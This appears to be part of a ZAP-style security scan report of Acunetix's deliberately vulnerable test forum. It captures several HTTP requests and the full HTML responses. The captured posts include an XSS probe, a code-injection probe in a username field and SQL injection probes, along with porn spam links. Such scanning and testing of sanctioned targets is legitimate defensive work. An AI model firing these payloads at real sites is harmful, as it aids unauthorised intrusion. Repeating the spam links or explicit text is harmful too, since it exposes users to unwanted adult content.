<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4421 |
| Response Body - size: 4,421 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4138 |
| Response Body - size: 4,138 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4374 |
| Response Body - size: 4,374 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4491 |
| Response Body - size: 4,491 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
